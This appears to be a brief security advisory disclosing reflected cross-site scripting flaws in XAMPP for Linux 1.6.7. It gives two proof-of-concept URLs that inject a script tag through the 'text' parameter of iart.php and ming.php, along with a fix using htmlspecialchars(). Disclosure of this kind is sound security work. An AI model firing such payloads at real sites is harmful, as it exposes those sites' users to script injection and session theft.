Xampp Linux 1.6.7 Multiple Cross Site Scripting Vulnerabilities
----------------------------------------------------------------
Program : Xampp Linux 1.6.7
Type : Multiple Cross Site Scripting Vulnerabilities
Alert : Medium
----------------------------------------------------------------
Download From :
http://puzzle.dl.sourceforge.net/sourceforge/xampp/xampp-linux-1.6.7.tar.gz
----------------------------------------------------------------
Discovered by : Khashayar Fereidani Or Dr.Crash
My Website : HTTP://FEREIDANI.IR
Team Website : Http://IRCRASH.COM
Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com
----------------------------------------------------------------
Cross Site Scripting Vulnerabilities :
Vulnerability work when register_globals set as on .
http://Example.com/xampp/iart.php?text=">><<>>"''<script>alert(document.alert)</script>
http://Example.com/xampp/ming.php?text=">><<>>"''<script>alert(document.alert)</script>
Solution : Remove xampp folder or filter text variable with htmlspecialchars()
function ....
----------------------------------------------------------------
Tnx : God
HTTP://IRCRASH.COM
----------------------------------------------------------------